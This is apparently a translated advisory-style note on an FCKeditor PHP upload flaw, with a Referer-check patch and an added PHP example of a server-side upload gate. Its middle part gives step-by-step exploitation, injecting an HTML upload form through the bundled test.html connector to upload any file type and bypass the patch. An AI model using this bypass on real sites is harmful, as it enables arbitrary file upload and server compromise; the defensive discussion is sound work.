Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix circulated online is as follows.
Fix: remove the FCK editor and use a different editor,
or locate the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below the lines
require('config.php');
require('util.php');
add the following code:
// Prevent external submissions
function outsidepost()
{
    $servername=$_SERVER['SERVER_NAME'];
    // Referer is sent by the client; @ suppresses the notice when it is absent
    $sub_from=@$_SERVER['HTTP_REFERER'];
    $sub_len=strlen($servername);
    // Skip the 7 characters of "http://" and take the host part of the Referer
    $checkfrom=substr($sub_from,7,$sub_len);
    if($checkfrom!=$servername){
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This blocks external submissions, but it does not block internal submissions.
Exploitation method:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then click Get Folders and Files; an upload form appears, and any file type can be uploaded.
PS: If the editors directory and the upload folder have been configured to return 403, 500 or 404, the exploit does not work.
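Added example (not from the original post and not FCKeditor code): the Referer comparison from outsidepost() as a boolean function, next to a server-side gate that does not rely on a client-supplied header. The names referer_check_passes, upload_allowed, ALLOWED_EXT and the session key editor_user are hypothetical, and the inputs at the bottom are constructed.

```php
<?php
// Added example, not FCKeditor code. Hypothetical names: referer_check_passes,
// upload_allowed, ALLOWED_EXT, and the session key 'editor_user'.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Same comparison as outsidepost(), returned as a boolean instead of exit.
function referer_check_passes(string $serverName, string $referer): bool
{
    return substr($referer, 7, strlen($serverName)) === $serverName;
}

// Server-side decision that does not depend on any request header.
function upload_allowed(array $session, array $file): bool
{
    // The caller must be an authenticated editor user.
    if (empty($session['editor_user'])) {
        return false;
    }
    // PHP must report a clean upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    $name = strtolower($file['name'] ?? '');
    // Refuse NUL bytes and names with more than one dot (e.g. x.php.jpg).
    if (strpos($name, "\0") !== false || substr_count($name, '.') !== 1) {
        return false;
    }
    // Allowlist the extension; everything else is refused by default.
    return in_array(pathinfo($name, PATHINFO_EXTENSION), ALLOWED_EXT, true);
}

// Constructed inputs: a request whose Referer is a page on the same site.
$server  = 'www.url.com';
$referer = 'http://www.url.com/editors/fckeditor/editor/filemanager/'
         . 'browser/default/connectors/test.html';
$script  = ['name' => 'page.php',  'error' => UPLOAD_ERR_OK];
$image   = ['name' => 'photo.png', 'error' => UPLOAD_ERR_OK];

// Referer check alone, for a same-site page.
var_dump(referer_check_passes($server, $referer));
// Server-side gate: no session, then a logged-in user with each file.
var_dump(upload_allowed([], $image));
var_dump(upload_allowed(['editor_user' => 'alice'], $script));
var_dump(upload_allowed(['editor_user' => 'alice'], $image));
```

In a real handler the accepted file should also be stored under a server-generated name in a directory where script execution is disabled.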